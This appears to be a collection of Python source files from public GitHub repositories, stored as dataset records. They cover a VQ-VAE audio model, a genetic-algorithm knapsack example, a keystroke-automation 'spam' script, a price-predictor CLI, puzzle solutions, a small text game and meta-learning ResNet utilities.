model.get_condition(self.input_batch, self.gc_batch)\n\n self.session = tf.Session(config=session_config)\n\n if checkpoint_path is not None:\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n self.session.run(init_op)\n print('Loading checkpoint: %s' % checkpoint_path)\n self.model.load(self.session, checkpoint_path)\n\n def close(self):\n tf.reset_default_graph()\n self.sess.close()\n\n def get_condition(self, src, gc):\n n_sample = src.shape[1]\n if n_sample <= self.sample_size:\n n_frame = 1\n n_padding = self.sample_size - n_sample\n else:\n n_frame = int(math.ceil(float(n_sample) / self.sample_size))\n n_padding = self.sample_size * n_frame - n_sample\n\n src = np.pad(src, ((0, 0), (0, n_padding)), 'constant')\n src = src.reshape(self.batch_size, -1, 1)\n \n assert (src.shape[1] % self.sample_size) == 0\n\n inputs = np.split(src, n_frame, axis=1)\n\n result = []\n for input in inputs:\n lc = self.session.run(self.lc, feed_dict={self.input_batch: input, self.gc_batch: gc})\n result.append(lc)\n\n lc = np.hstack(result)\n\n return lc\n\n def convert(self, gc, src=None, file=None, use_randomness=True):\n assert src is not None or file is not None\n if src is None:\n src, _ = librosa.load(file, sr=self.sample_rate, mono=True)\n \n src = mu_law_numpy(src)\n\n n_samples = src.shape[1]\n\n a_lc = self.get_condition(src, gc)\n\n a_gc = self.session.run(self.gc, feed_dict={self.gc_batch: gc})\n a_gc = a_gc.reshape(self.batch_size, -1)\n \n seed = src[:, 0].reshape(-1, 1)\n waveform, _ = self.model.generate_waveform(self.session, n_samples, a_lc, a_gc, \n seed=seed, use_randomness=use_randomness)\n\n result = inv_mu_law_numpy(waveform, quantization_channels=self.model.quantization_channels)\n \n return 
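The loss() above routes the reconstruction gradient around the non-differentiable codebook lookup by assembling encoder gradients manually with tf.gradients. A more common, equivalent trick is the straight-through estimator, sketched here as a hypothetical alternative rather than what this repository does:

import tensorflow as tf

def straight_through(z_e, z_q):
    # forward pass uses z_q; backward pass copies gradients to z_e unchanged,
    # so a single optimizer.minimize(recon + vq_loss + beta * commit) would suffice
    return z_e + tf.stop_gradient(z_q - z_e)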
result\n","repo_name":"mahdeslami11/vqvae","sub_path":"vqvae/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":22353,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"16"} +{"seq_id":"29625903622","text":"#!/usr/bin/env python3\n\"\"\"\n OptivolutionPy example project.\n Solving the Multi-dimensional knapsack problem.\n\"\"\"\n\nimport random\n\nfrom optivolution.population import Population\nfrom optivolution.chromosome import Chromosome\n\nclass MultiDimensinalKnapsack(Chromosome):\n \"\"\" Inidividual knapsack object. \"\"\"\n maximum_weight = 12210\n maximum_volume = 12\n knapsack_data = [(821, 0.8, 118), (1144, 1, 322), (634, 0.7, 166), (701, 0.9, 195),\n (291, 0.9, 100), (1702, 0.8, 142), (1633, 0.7, 100), (1086, 0.6, 145),\n (124, 0.6, 100), (718, 0.9, 208), (976, 0.6, 100), (1438, 0.7, 312),\n (910, 1, 198), (148, 0.7, 171), (1636, 0.9, 117), (237, 0.6, 100),\n (771, 0.9, 329), (604, 0.6, 391), (1078, 0.6, 100), (640, 0.8, 120),\n (1510, 1, 188), (741, 0.6, 271), (1358, 0.9, 334), (1682, 0.7, 153),\n (993, 0.7, 130), (99, 0.7, 100), (1068, 0.8, 154), (1669, 1, 289)] \n\n def __init__(self, genes_length=len(knapsack_data), genes=[]):\n super().__init__(genes_length, genes)\n \n @Chromosome.fitness_property\n def fitness(self):\n \"\"\" Defining the fitness function.\n The fitness is calculated as the total price in this problem.\n \"\"\"\n weight, volume, price = 0, 0, 0\n for i in range(self.genes_length):\n if self.genes[i]:\n weight += self.knapsack_data[i][0]\n volume += self.knapsack_data[i][1]\n price += self.knapsack_data[i][2]\n\n if weight > self.maximum_weight or volume > self.maximum_volume:\n price = 0\n\n return price\n\n def random_gene(self):\n \"\"\" Defining the random gene. \"\"\"\n return random.choice((0, 1))\n\nclass KnapscakPopulation(Population):\n tournament_sample_percentage = 2.5\n\n def random_individual(self):\n \"\"\" Defining the random individual in the population. 
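The knapsack fitness above sums the weight, volume and price of the selected items and zeroes the score as soon as either capacity limit is exceeded. A tiny worked example of that rule on the first three items of the data set, with an arbitrary toy selection:

items = [(821, 0.8, 118), (1144, 1.0, 322), (634, 0.7, 166)]   # (weight, volume, price)
genes = [1, 0, 1]                                              # take items 0 and 2
weight = sum(w for g, (w, v, p) in zip(genes, items) if g)     # 1455
volume = sum(v for g, (w, v, p) in zip(genes, items) if g)     # 1.5
price = sum(p for g, (w, v, p) in zip(genes, items) if g)      # 284
fitness = price if weight <= 12210 and volume <= 12 else 0
print(fitness)                                                  # 284: both limits hold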
\"\"\"\n return MultiDimensinalKnapsack()\n\ndef main():\n population = KnapscakPopulation(population_size=200)\n \n population.run(100)\n \n print(f\"Generation {population.generation_number}\")\n \n best = population.get_best_individual()\n \n # The optimal answer for this test case is\n # (3531, [0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1])\n print((best.fitness, best.genes))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mhmd-Hisham/OptivolutionPy","sub_path":"examples/multi_dimensional_knapsack.py","file_name":"multi_dimensional_knapsack.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33392151098","text":"import sys\nimport os\nimport pyautogui,time\nfrom PySide2 import QtCore, QtWidgets, QtGui\nfrom PySide2.QtWidgets import QDialog\nfrom untitled2 import *\nclass Mainspam(QtWidgets.QWidget):\n c=0\n def __init__(self,parent=None):\n QtWidgets.QWidget.__init__(self,parent)\n self.ui = Ui_spam()\n self.ui.setupUi(self)\n QtCore.QObject.connect(self.ui.busca,QtCore.SIGNAL('clicked()'),self.mostrarmensaje)\n QtCore.QObject.connect(self.ui.busca,QtCore.SIGNAL('clicked()'),self.get_text)\n def mostrarmensaje(self):\n self.ui.contador.setText(\"Tienes 5 seg\")\n def get_text(self):\n file_path=QFileDialog.getOpenFileName(self,'Open Text File',r\"C:\\\\users\",\"Text Files (*.txt)\")\n v=\"\"\n v=file_path[0]\n with open(v,\"r\")as f:\n time.sleep(6)\n for word in f:\n pyautogui.typewrite(word)\n pyautogui.press(\"enter\")\n\nif __name__==\"__main__\":\n app=QtWidgets.QApplication(sys.argv)\n myapp=Mainspam()\n myapp.show()\n sys.exit(app.exec_())\n time.sleep(5)\n","repo_name":"Alfredoht29/Python_Bot","sub_path":"MainSpam.py","file_name":"MainSpam.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33680658983","text":"from .price_predictor import quick_tomorrow\r\nfrom argparse import ArgumentParser\r\n\r\ndef main():\r\n name_library = 'price_predictor'\r\n parser = ArgumentParser(description=\"\", add_help=True, usage=\"\"\"\r\n {0} [symbol] #look for the symbol on yahoo finance\r\n {2:{1}} [--date (str)]\r\n {2:{1}} [--target (str)]\r\n {2:{1}} [--stamps (int)]\r\n {2:{1}} [--ratio (float)]\r\n {2:{1}} [--layers (int)]\r\n {2:{1}} [--epochs (int)]\r\n {0} --help\"\"\".format(name_library, len(name_library), ''))\r\n \r\n tomorrow = parser.add_argument_group(\"Get tomorrow's opening market price\",\r\n \"Specify a symbol present on yahoo finance, you can set the training to test ratio, the n° of and ephochs of the LSTM. 
\"\r\n \"If not specified the parameters will be set as it follows: \"\r\n \"date = '2010-07-01', \\ntarget_value = 'Open', \\ntime_stamps = 30, \\ntraining_to_test_data_ratio = 0.9, \\nn_layers = 4, \\nn_epochs = 10\")\r\n \r\n tomorrow.add_argument('symbol', type=str, nargs='*', help='Yahoo finance symbol to download the CSV with the data')\r\n tomorrow.add_argument('-d', '--date', type=str, help='Specify the date from which to start gathering data', metavar = '')\r\n tomorrow.add_argument('-t', '--target', type=str, help=\"Specify a target between Open, Close, High, Low, 'Adj Close' and Volume\", metavar = '')\r\n tomorrow.add_argument('-s', '--stamps', type=int, help='Specify how many time stamps to have in each record training sequence', metavar = '')\r\n tomorrow.add_argument('-r', '--ratio', type=float, help='Specify the ratio to split the training and test data', metavar = '')\r\n tomorrow.add_argument('-l', '--layers', type=int, help='Specify the number of layers of the neural network (if less than 2 is specified it will be 2 by default)', metavar = '')\r\n tomorrow.add_argument('-e', '--epochs', type=int, help='Specify the number of epochs of the neural network', metavar = '')\r\n\r\n args = parser.parse_args()\r\n\r\n if args.symbol == []:\r\n parser.print_help()\r\n \r\n else:\r\n #I just need the prediction, no need of the model in the command line, thus [1]\r\n quick_tomorrow(code = args.symbol[0], plot = True,\r\n start_from_date = args.date,\r\n target_value = args.target,\r\n time_stamps = args.stamps,\r\n training_to_test_ratio = args.ratio, \r\n n_layers = args.layers,\r\n n_epochs = args.epochs)[1]\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"lwdovico/price-predictor","sub_path":"price_predictor/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"1842453637","text":"# 31256KB / 40ms\nimport sys\ninput = sys.stdin.readline\nN = int(input()) # 토핑종류의 수\nA, B = map(int, input().split()) # 도우의 가격, 토핑의 가격\nC = int(input()) # 도우의 열량\nD_list = [] # 각 토핑의 열량\nfor _ in range(N):\n D_list.append(int(input()))\nD_list.sort(reverse=True)\nbest_pizza = C//A\ncalory_sum = C\nfor i in range(N):\n calory_sum += D_list[i]\n pizza = calory_sum//(A+B*(i+1))\n if best_pizza <= pizza:\n best_pizza = pizza\n else:\n break\nprint(best_pizza)","repo_name":"meeeeju/Python-Algorithm-Study","sub_path":"yang/BOJ/그리디/5545_최고의 피자.py","file_name":"5545_최고의 피자.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36630757677","text":"\n\ndef main():\n\tvect = [int(line.rstrip('\\n')) for line in open(\"input.txt\")]\n\toutput = open(\"output.txt\",\"w\")\n\toccurr = [0]\n\tcounter = 0\n\ti = 0\n\t\n\twhile True:\n\t\tcounter += vect[i%len(vect)]\n\t\toutput.write(str(counter)+'\\n')\n\t\tfor elem in occurr:\n\t\t\tif counter == elem:\n\t\t\t\tprint(counter)\n\t\t\t\treturn\n\t\toccurr.append(counter)\n\t\tprint(i)\n\t\ti = i+1\n\nif __name__ == \"__main__\":\n\tmain()\n\t\n","repo_name":"kientuong114/Advent_Of_Code_2018","sub_path":"Day1/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27784181674","text":"hecho = False\nvidasElfo=3\nvidasOrco=3\n\nwhile not hecho:\n\tsalir = input (\"Quiere 
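The pizza solution above sorts toppings by calories and keeps adding them while the integer calories-per-cost ratio does not drop. A small worked instance with made-up prices and calories that reproduces the same loop:

A, B, C = 10, 5, 100                      # dough price, topping price, dough calories
toppings = sorted([40, 80, 10], reverse=True)
best, total = C // A, C
for i, topping in enumerate(toppings, start=1):
    total += topping
    candidate = total // (A + B * i)
    if candidate < best:                  # adding more toppings only gets worse
        break
    best = candidate
print(best)                               # 12: dough plus the single 80-calorie topping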
salir?(s/n)\")\n\tif salir ==\"s\":\n\t\thecho = True\n\tataque = input (\"atacar con el elfo (s/n)\")\n\tif ataque == \"s\":\n\t\t#chequeo de ataque\n\t\topcion= int(input(\"elija un numero entre 1 y 9\"))\n\t\tif opcion == 1 or opcion ==3 or opcion ==5 or opcion ==7 or opcion ==9:\n\t\t\t\n\t\t\tvidasOrco = vidasOrco - 1\n\t\t\t# chequeo vidas orco\n\t\t\tif vidasOrco == 0:\n\t\t\t\tprint (\"el orco murió, HAS GANADO!!!\")\n\t\t\t\thecho = True\n\t\t\telse:\n\t\t\t\tprint (\"el orco está herido\")\n\t\telse:\n\t\t\tprint (\"no le diste - ahora te atacan....\")\n\t\t\t\n\telse:\n\t\t hecho = True\n\t\t \n\t\t\n","repo_name":"FedePodesta/Python-Introductorio","sub_path":"Python Introductorio/juego-elfo-orco-final.py","file_name":"juego-elfo-orco-final.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"29565410809","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\n\n# from torchvision import models\nfrom torchvision.models.utils import load_state_dict_from_url\nfrom torchvision.models.resnet import model_urls\n\nclass Linear_fw(nn.Linear):\n def __init__(self, in_features, out_features):\n super(Linear_fw, self).__init__(in_features, out_features)\n self.weight.fast = None\n self.bias.fast = None\n\n def forward(self, x):\n if self.weight.fast is not None and self.bias.fast is not None:\n out = F.linear(x, self.weight.fast,\n self.bias.fast)\n else:\n out = super(Linear_fw, self).forward(x)\n return out\n\n\nclass Conv2d_fw(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, bias=True):\n super(Conv2d_fw, self).__init__(in_channels, out_channels, kernel_size, stride=stride, padding=padding,\n bias=bias)\n self.weight.fast = None\n if not self.bias is None:\n self.bias.fast = None\n\n def forward(self, x):\n if self.bias is None:\n if self.weight.fast is not None:\n out = F.conv2d(x, self.weight.fast, None, stride=self.stride, padding=self.padding)\n else:\n out = super(Conv2d_fw, self).forward(x)\n else:\n if self.weight.fast is not None and self.bias.fast is not None:\n out = F.conv2d(x, self.weight.fast, self.bias.fast, stride=self.stride, padding=self.padding)\n else:\n out = super(Conv2d_fw, self).forward(x)\n\n return out\n\n\nclass BatchNorm2d_fw(nn.BatchNorm2d):\n def __init__(self, num_features):\n super(BatchNorm2d_fw, self).__init__(num_features)\n self.weight.fast = None\n self.bias.fast = None\n\n def forward(self, input):\n self._check_input_dim(input)\n\n if self.momentum is None:\n exponential_average_factor = 0.0\n else:\n exponential_average_factor = self.momentum\n\n if self.training and self.track_running_stats:\n if self.num_batches_tracked is not None:\n self.num_batches_tracked = self.num_batches_tracked + 1\n if self.momentum is None:\n exponential_average_factor = 1.0 / float(self.num_batches_tracked)\n else:\n exponential_average_factor = self.momentum\n\n \"\"\" Decide whether the mini-batch stats should be used for normalization rather than the buffers.\n Mini-batch stats are used in training mode, and in eval mode when buffers are None.\n \"\"\"\n if self.training:\n bn_training = True\n else:\n bn_training = (self.running_mean is None) and (self.running_var is None)\n\n \"\"\"Buffers are only updated if they are to be tracked and we are in training mode. Thus they only need to be\n passed when the update should occur (i.e. 
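The *_fw layers above read their parameters from a .fast attribute whenever it is set, which is how MAML-style methods keep adapted weights separate from the slow meta-parameters. A minimal sketch of an inner-loop step that populates those attributes, assuming the module is built entirely from the fast-weight layers defined here and with inner_lr as a hypothetical step size:

import torch

def inner_loop_step(module, loss, inner_lr=0.01):
    params = list(module.parameters())
    grads = torch.autograd.grad(loss, params, create_graph=True)
    for p, g in zip(params, grads):
        # first step starts from the slow weights, later steps chain the fast ones
        p.fast = (p if p.fast is None else p.fast) - inner_lr * g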
in training mode when they are tracked), or when buffer stats are\n used for normalization (i.e. in eval mode when buffers are not None).\n \"\"\"\n\n if self.weight.fast is not None and self.bias.fast is not None:\n return F.batch_norm(\n input,\n self.running_mean if not self.training or self.track_running_stats else None,\n self.running_var if not self.training or self.track_running_stats else None,\n self.weight.fast, self.bias.fast, bn_training, exponential_average_factor, self.eps)\n else:\n return F.batch_norm(\n input,\n self.running_mean if not self.training or self.track_running_stats else None,\n self.running_var if not self.training or self.track_running_stats else None,\n self.weight, self.bias, bn_training, exponential_average_factor, self.eps)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = Conv2d_fw(in_channels=inplanes, out_channels=planes, kernel_size=3,\n stride=stride, padding=1, bias=False)\n self.bn1 = BatchNorm2d_fw(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = Conv2d_fw(in_channels=planes, out_channels=planes, kernel_size=3,\n stride=1, padding=1, bias=False)\n self.bn2 = BatchNorm2d_fw(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass ResNetFast(nn.Module):\n def __init__(self, block, layers):\n self.inplanes = 64\n super(ResNetFast, self).__init__()\n self.conv1 = Conv2d_fw(3, 64, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = BatchNorm2d_fw(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(512 * block.expansion, 1000)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n Conv2d_fw(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=stride, bias=False),\n BatchNorm2d_fw(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n\n return x\n\n\nclass ClassifierFast(nn.Module):\n def __init__(self, backbone1, backbone2, backbone3, num_classes):\n super(ClassifierFast, self).__init__()\n self.backbone1 = backbone1\n self.backbone2 = 
backbone2\n self.backbone3 = backbone3\n\n self.backbones = [self.backbone1, self.backbone2, self.backbone3]\n\n self.num_classes = num_classes\n self._features_dim = 512\n\n self.head1 = Linear_fw(self._features_dim, num_classes)\n self.head2 = Linear_fw(self._features_dim, num_classes)\n self.head3 = Linear_fw(self._features_dim, num_classes)\n\n self.heads = [self.head1, self.head2, self.head3]\n\n @property\n def features_dim(self):\n \"\"\"The dimension of features before the final `head` layer\"\"\"\n return self._features_dim\n\n def forward(self, x, domain=-1):\n \"\"\"\"\"\"\n if domain == -1:\n predictions = []\n f_list = []\n for s_domain in range(3):\n f = self.backbones[s_domain](x)\n f = f.view(-1, self._features_dim)\n prediction = self.heads[s_domain](f)\n predictions.append(prediction)\n f_list.append(f)\n\n else:\n f = self.backbones[domain](x)\n f = f.view(-1, self._features_dim)\n f_list = f\n predictions = self.heads[domain](f)\n return predictions, f_list\n\n def get_parameters(self):\n \"\"\"A parameter list which decides optimization hyper-parameters,\n such as the relative learning rate of each layer\n \"\"\"\n params = [\n {\"params\": self.backbone1.parameters(), \"lr_mult\": 1.0},\n {\"params\": self.backbone2.parameters(), \"lr_mult\": 1.0},\n {\"params\": self.backbone3.parameters(), \"lr_mult\": 1.0},\n {\"params\": self.head1.parameters(), \"lr_mult\": 1.0},\n {\"params\": self.head2.parameters(), \"lr_mult\": 1.0},\n {\"params\": self.head3.parameters(), \"lr_mult\": 1.0},\n ]\n return params\n\n\ndef resnet18_fast(progress=True):\n r\"\"\"ResNet-18 model from\n `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_\n\n Parameters:\n - **pretrained** (bool): If True, returns a model pre-trained on ImageNet\n - **progress** (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n model = ResNetFast(BasicBlock, [2, 2, 2, 2])\n state_dict = load_state_dict_from_url(model_urls['resnet18'],\n progress=progress)\n model.load_state_dict(state_dict, strict=False)\n del model.fc\n\n return model\n","repo_name":"thuml/OpenDG-DAML","sub_path":"src/tools/daml_utils.py","file_name":"daml_utils.py","file_ext":"py","file_size_in_byte":9674,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"16"} +{"seq_id":"929591379","text":"import numpy as np\nimport os, pickle, sys\nfrom torch.utils.data import Sampler\nfrom torch._six import int_classes as _int_classes\nimport random\nimport torch, torchvision\nfrom PIL import Image\nfrom torchvision.datasets.folder import ImageFolder\nimport torch.distributed as dist\nimport torch.distributions.bernoulli as ber\nimport torch.nn.functional as F\ndef _flatten(values):\n if isinstance(values, np.ndarray) or torch.is_tensor(values):\n yield values.flatten()\n else:\n for value in values:\n yield from _flatten(value)\n\ndef flatten(values):\n # flatten nested lists of np.ndarray to np.ndarray\n return np.concatenate(list(_flatten(values)))\n\ndef flatten_torch_tensor(values):\n # flatten nested lists of np.ndarray to np.ndarray\n return torch.cat(list(_flatten(values)), 0)\n\ndef _unflatten(flat_values, prototype, offset):\n if isinstance(prototype, np.ndarray):\n shape = prototype.shape\n new_offset = offset + np.product(shape)\n value = flat_values[offset:new_offset].reshape(shape)\n return value, new_offset\n else:\n result = []\n for value in prototype:\n value, offset = _unflatten(flat_values, value, offset)\n result.append(value)\n 
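ClassifierFast above keeps one ResNet-18 backbone and one linear head per source domain and can answer either for a single domain or for all three at once. A hedged usage sketch; the input batch is a dummy tensor, num_classes=10 is arbitrary, and resnet18_fast downloads pretrained weights:

import torch

backbones = [resnet18_fast() for _ in range(3)]
clf = ClassifierFast(*backbones, num_classes=10)
x = torch.randn(2, 3, 224, 224)            # placeholder image batch
logits_d1, feats_d1 = clf(x, domain=1)     # single source-domain branch
all_logits, all_feats = clf(x)             # domain=-1: one prediction per branch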
return result, offset\n\ndef unflatten(flat_values, prototype):\n # unflatten np.ndarray to nested lists with structure of prototype\n result, offset = _unflatten(flat_values, prototype, 0)\n assert(offset == len(flat_values))\n return result\n\ndef _unflatten_torch_tensor(flat_values, prototype, offset):\n if torch.is_tensor(prototype):\n shape = prototype.shape\n new_offset = offset + prototype.numel()\n value = flat_values[offset:new_offset].reshape(shape)\n return value, new_offset\n else:\n result = []\n for value in prototype:\n value, offset = _unflatten_torch_tensor(flat_values, value, offset)\n result.append(value)\n return result, offset\n\ndef unflatten_torch_tensor(flat_values, prototype):\n # unflatten np.ndarray to nested lists with structure of prototype\n result, offset = _unflatten_torch_tensor(flat_values, prototype, 0)\n assert(offset == len(flat_values))\n return result\n\ndef quantize_tensor(a):\n sign = torch.sign(a)\n abs_a = torch.abs(a)\n max_a = torch.max(abs_a)\n sampled = ber.Bernoulli(abs_a / max_a).sample()\n return torch.mul(sign*max_a, sampled)\n\n\nclass ToNumpy(object):\n \"\"\"Convert a ``PIL Image`` or ``numpy.ndarray`` to tensor.\n\n Converts a PIL Image or numpy.ndarray (H x W x C) in the range\n [0, 255] to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0].\n \"\"\"\n\n def __call__(self, pic):\n \"\"\"\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return np.array(pic)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass Groupwise_Sampler(Sampler):\n r\"\"\"Samples elements from [0,..,len(weights)-1] with given probabilities (weights).\n\n Arguments:\n weights (sequence) : a sequence of weights, not necessary summing up to one\n num_samples (int): number of samples to draw\n replacement (bool): if ``True``, samples are drawn with replacement.\n If not, they are drawn without replacement, which means that when a\n sample index is drawn for a row, it cannot be drawn again for that row.\n \"\"\"\n\n def __init__(self, dataset, replacement=True):\n self.dataset = dataset\n self.replacement = replacement\n self.group_indicator = np.zeros( (len(self.dataset), ) )\n self.importance = np.ones( (len(self.dataset), ) )\n self.cur_sample_index = 0\n self.group_index = 0\n self.last_update_iteration = -1\n\n def update_importance(self, iteration, update_batchsize, model, device='cuda'):\n\n if iteration > self.last_update_iteration:\n self.group_index += 1\n self.last_update_iteration = iteration\n\n start_index = self.cur_sample_index\n end_index = min(self.cur_sample_index + update_batchsize, len(self.dataset) )\n\n data, label = self.dataset.get_slice(start_index, end_index)\n\n ## compute sample importances\n data = data.to(device)\n label = label.to(device)\n output = model(data)\n presam_losses = F.cross_entropy(output, label, reduction='none')\n\n\n self.importance[start_index:end_index] = presam_losses.detach().cpu().numpy()\n self.group_indicator[start_index:end_index] = self.group_index\n\n if end_index == len(self.dataset):\n self.cur_sample_index = 0\n else:\n self.cur_sample_index = end_index\n\n def __iter__(self):\n counter = 0\n\n while True:\n group_member_location = self.group_indicator==self.group_index\n group_importances = self.importance[group_member_location]\n group_importances = group_importances + np.mean(group_importances)\n group_importances = group_importances / np.sum(group_importances)\n\n # this is just the group 
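quantize_tensor above keeps only the sign and the global maximum magnitude and samples each entry with probability |a|/max|a|, so its expectation equals the original tensor. A short self-contained check of that unbiasedness, mirroring the rule of the function defined above:

import torch
import torch.distributions.bernoulli as ber

def stochastic_quantize(a):                       # same rule as quantize_tensor above
    sign, abs_a = torch.sign(a), torch.abs(a)
    max_a = torch.max(abs_a)
    return sign * max_a * ber.Bernoulli(abs_a / max_a).sample()

a = torch.tensor([0.1, -0.4, 0.8])
estimate = torch.stack([stochastic_quantize(a) for _ in range(20000)]).mean(dim=0)
print(estimate)   # approaches tensor([0.1000, -0.4000, 0.8000])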
index, need to convert back to global index\n index_list = torch.multinomial(torch.Tensor(group_importances),\n 1, self.replacement).tolist()\n group_member_index = group_member_location.nonzero()[0]\n for i in group_member_index[np.array(index_list)]:\n yield i\n counter += 1\n if counter >= len(self.dataset):\n return\n\n def __len__(self):\n return self.num_samples\n\nclass SampleImageFolder(ImageFolder):\n\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (index, sample, target) where target is class_index of the target class.\n index in the location of the sample in the whole dataset\n \"\"\"\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return index, sample, target\n\nclass Average(object):\n\n def __init__(self):\n self.sum = 0\n self.count = 0\n\n def update(self, value, number):\n self.sum += value * number\n self.count += number\n\n @property\n def average(self):\n return self.sum / self.count\n\n def __str__(self):\n return '{:.6f}'.format(self.average)\n\nclass EMAverage(object):\n\n def __init__(self, alpha=0.9):\n self.first_update = True\n self.value = 0\n self.alpha = alpha\n\n def update(self, value):\n\n if self.first_update:\n self.value = value\n self.first_update = False\n else:\n self.value = self.alpha*self.value + (1 - self.alpha) * value\n\n\n def __str__(self):\n return '{:.6f}'.format(self.value)\n\n\nclass Accuracy(object):\n\n def __init__(self):\n self.correct = 0\n self.count = 0\n\n def update(self, output, label):\n predictions = output.data.argmax(dim=1)\n correct = predictions.eq(label.data).sum().item()\n\n self.correct += correct\n self.count += output.size(0)\n\n @property\n def accuracy(self):\n return self.correct / self.count\n\n def __str__(self):\n return '{:.2f}%'.format(self.accuracy * 100)\n\nclass My_CIFAR10(torchvision.datasets.CIFAR10):\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (image, target) where target is index of the target class.\n \"\"\"\n img, target = self.data[index], self.targets[index]\n\n # doing this so that it is consistent with all other datasets\n # to return a PIL Image\n img = Image.fromarray(img)\n\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return index, img, target\n\n def get_slice(self, start, end):\n imgs = []\n targets = []\n\n for i in range(start, end):\n index, img, target = self[i]\n imgs.append(img)\n targets.append(target)\n\n return torch.stack(imgs), torch.LongTensor(targets)\n\n\n\n\n\n\ndef allreduce(t):\n \"\"\" Implementation of a ring-reduce. 
\"\"\"\n rank = dist.get_rank()\n size = dist.get_world_size()\n\n tensors = torch.chunk(t, size)\n assert len(tensors) == size\n\n\n recv_buff_1 = torch.zeros(tensors[0].size())\n recv_buff_2 = torch.zeros(tensors[-1].size())\n\n left = ((rank - 1) + size) % size\n right = (rank + 1) % size\n\n for i in range(size - 1):\n send_slice_idx = ((-i % size) + rank ) % size\n rec_slice_idx = (rank - i - 1) % size\n\n recv_buff = recv_buff_2 if rec_slice_idx == len(tensors) -1 else recv_buff_1\n\n send_req = dist.isend(tensors[send_slice_idx], right)\n\n dist.recv(recv_buff, left)\n tensors[rec_slice_idx][:] += recv_buff\n\n send_req.wait()\n\n\n for i in range(size - 1):\n send_slice_idx = (1 + rank - i ) % size\n rec_slice_idx = ( rank- i) % size\n\n\n recv_buff = recv_buff_2 if rec_slice_idx == len(tensors) -1 else recv_buff_1\n\n send_req = dist.isend(tensors[send_slice_idx], right)\n\n dist.recv(recv_buff, left)\n tensors[rec_slice_idx][:] = recv_buff\n\n send_req.wait()\n\n\n return torch.cat(tensors,0)\n\n\n\n\nif __name__ == '__main__':\n weights = [0 if i>10 else 1 for i in range(1,101)]\n weights_new = [1-i for i in weights]\n sampler = WeightedRandomSampler_2(weights, len(weights))\n\n a = iter(sampler)\n\n for idx, a1 in enumerate(a):\n if idx > 10:\n sampler.update_weights(weights_new)\n print(idx, 